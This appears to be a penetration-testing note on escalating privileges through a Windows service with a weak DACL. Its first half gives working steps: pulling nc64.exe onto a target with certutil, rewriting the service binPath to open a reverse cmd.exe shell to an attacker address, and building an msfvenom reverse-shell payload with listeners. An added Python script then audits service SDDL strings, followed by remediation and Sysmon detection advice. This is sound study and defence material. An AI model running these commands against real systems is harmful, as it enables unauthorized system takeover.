Exploiting insecure service with Netcat

  1. Host the nc binary using Python:
    python3 -m http.server 8000

    Note: Kali has a built-in copy of nc.exe located in /usr/share/windows-resources/binaries/.

  2. Transfer the binary to the target machine using certutil:
    certutil -urlcache -f http://[IP-ADDRESS]:8000/nc64.exe nc64.exe

  3. To exploit the service, place the transferred binary (nc64.exe) in C:\Temp and point the service binary path at it:
    sc config daclsvc binPath= "C:\Temp\nc64.exe [IP-ADDRESS] 443 -e C:\Windows\System32\cmd.exe"

  4. On the attacker machine, set up a Netcat listener on port 443, then start the service:
    sc start daclsvc

Exploiting insecure service with Metasploit

  1. Generate a reverse shell payload with msfvenom:
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=[PORT] -f exe-service -o reverse.exe

    Note: After creating the reverse shell payload, transfer it to the target machine.

  2. Start a listener on the attacking machine with Metasploit (the handler payload must match the one given to msfvenom, here the stageless windows/x64/shell_reverse_tcp):
    msfconsole -q -x "use multi/handler; set payload windows/x64/shell_reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"

  3. Alternatively, start a listener with Netcat on the same port as LPORT (1338 here); rlwrap adds line editing and history to the raw shell:
    sudo rlwrap -cAr nc -lvnp 1338

  4. Modify the service binary path, then restart the service:
    sc config daclsvc binPath= "C:\Temp\reverse.exe"
    sc stop daclsvc
    sc start daclsvc

    Note: net start daclsvc also starts the service.
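Both sections above depend on the same weakness: the service's DACL grants a low-privilege principal SERVICE_CHANGE_CONFIG (and usually start/stop), so anyone in that group can rewrite binPath and re-execute the service. The script below is an added defender-side check, not part of the original page: it parses the SDDL string that `sc.exe sdshow <service>` prints and reports access-allowed ACEs that give takeover rights to catch-all groups (Everyone, Authenticated Users, Builtin Users, ...) or to specific account SIDs. The rights and trustee tables are the documented SDDL abbreviations; the descriptors in SAMPLE_SDDL are constructed, and the name daclsvc is reused from the steps above.

```python
"""Audit a Windows service DACL (the SDDL string printed by `sc.exe sdshow <name>`) for
ACEs that let low-privilege principals reconfigure or restart the service.
Added example; the SDDL samples in SAMPLE_SDDL are constructed, not captured from a host."""
from __future__ import annotations

import re
from dataclasses import dataclass

# SDDL rights codes for services. Positional ambiguity to keep in mind: "WD" in the
# rights field is WRITE_DAC, while "WD" in the trustee field is Everyone.
RIGHT_BITS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8,      # query config, CHANGE CONFIG, query status, enum deps
    "RP": 0x10, "WP": 0x20, "DT": 0x40, "LO": 0x80,  # start, stop, pause/continue, interrogate
    "CR": 0x100,                                     # user-defined control
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,  # delete, read ctl, WRITE DAC, WRITE OWNER
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,  # generic rights
    "FA": 0x001F01FF,  # FILE_ALL_ACCESS: rare on services, but its bits cover DC/WD/WO
}
# Rights that let a principal take over the service, directly or by rewriting its ACL.
TAKEOVER_RIGHTS = {0x2: "SERVICE_CHANGE_CONFIG", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
                   0x10000000: "GENERIC_ALL", 0x40000000: "GENERIC_WRITE"}
# With start/stop rights as well, the principal can trigger the rewritten binPath itself.
START_STOP = RIGHT_BITS["RP"] | RIGHT_BITS["WP"] | RIGHT_BITS["GA"]
# Trustee abbreviations that stand for catch-all, low-privilege groups.
BROAD_TRUSTEES = {"WD": "Everyone", "AU": "Authenticated Users", "BU": "Builtin Users",
                  "IU": "Interactive Users", "NU": "Network Users",
                  "BG": "Builtin Guests", "AN": "Anonymous Logon"}
DACL_RE = re.compile(r"D:[A-Z]*((?:\([^)]*\))*)")  # D:<flags><ace><ace>... stops before S:
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


@dataclass
class Finding:
    service: str
    trustee: str       # SID or abbreviation exactly as it appears in the ACE
    trustee_name: str
    rights: list[str]  # takeover rights granted
    can_restart: bool  # start/stop granted too
    severity: str      # "high" for catch-all groups, "review" for specific SIDs


def parse_rights(rights: str) -> int:
    """Convert an SDDL rights field (hex mask or run of two-letter codes) to a bit mask."""
    rights = rights.strip()
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    if len(rights) % 2:
        raise ValueError(f"malformed rights field {rights!r}")
    mask = 0
    for i in range(0, len(rights), 2):
        code = rights[i:i + 2]
        if code not in RIGHT_BITS:  # fail loudly rather than treat an unknown right as harmless
            raise ValueError(f"unknown rights code {code!r} in {rights!r}")
        mask |= RIGHT_BITS[code]
    return mask


def audit_service_sddl(service: str, sddl: str) -> list[Finding]:
    """One Finding per access-allowed ACE that grants takeover rights to a broad group
    or to a specific SID (which the caller should resolve before judging)."""
    match = DACL_RE.search(sddl)
    if match is None:  # no D: section means a NULL DACL: everyone has full control
        return [Finding(service, "*", "Everyone (NULL DACL)", ["GENERIC_ALL"], True, "high")]
    findings: list[Finding] = []
    for ace_type, _flags, rights, _obj, _inh, trustee in ACE_RE.findall(match.group(1)):
        if ace_type != "A":  # only access-allowed ACEs grant anything
            continue
        if trustee in BROAD_TRUSTEES:
            name, severity = BROAD_TRUSTEES[trustee], "high"
        elif trustee.startswith("S-1-5-21-"):
            name, severity = "account or group SID (resolve it)", "review"
        else:
            continue  # SY, BA, LS, NS, ... are privileged by design
        mask = parse_rights(rights)
        granted = [label for bit, label in TAKEOVER_RIGHTS.items() if mask & bit]
        if granted:
            findings.append(Finding(service, trustee, name, granted,
                                    bool(mask & START_STOP), severity))
    return findings


# Constructed sample descriptors (not captured from any real host).
SAMPLE_SDDL = {
    # Typical hardened service: SYSTEM and Administrators manage it, users may only query it.
    "hardened": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    # Builtin Users hold change-config plus start/stop: the condition the steps above rely on.
    "daclsvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BU)",
    # The same weakness written as a hex mask granted to Authenticated Users.
    "hexmask": "D:(A;;0x10000000;;;AU)",
    # A specific account SID (placeholder RIDs): flagged for review rather than resolved here.
    "specific": "D:(A;;CCDCLCSWRPWPDTLOCRSDRC;;;S-1-5-21-1111111111-2222222222-3333333333-1001)",
}

if __name__ == "__main__":
    for svc, sddl in SAMPLE_SDDL.items():
        for f in audit_service_sddl(svc, sddl):
            restart = "and can start/stop it" if f.can_restart else "but cannot restart it"
            print(f"[{f.severity}] {svc}: {f.trustee_name} ({f.trustee}) holds {', '.join(f.rights)} {restart}")
```

On a real host, feed the descriptor line from `sc.exe sdshow daclsvc` to audit_service_sddl; a "high" finding with can_restart set is exactly the state the steps above require. Remediation is to remove the offending ACE and write the corrected descriptor back with `sc sdset <service> <sddl>`. For detection, note that `sc config ... binPath=` rewrites the ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services\<service>, which Sysmon logs as Event ID 13 (RegistryEvent, value set) when that key is in scope of its configuration, so a binPath pointing into a user-writable directory such as C:\Temp is a cheap alert.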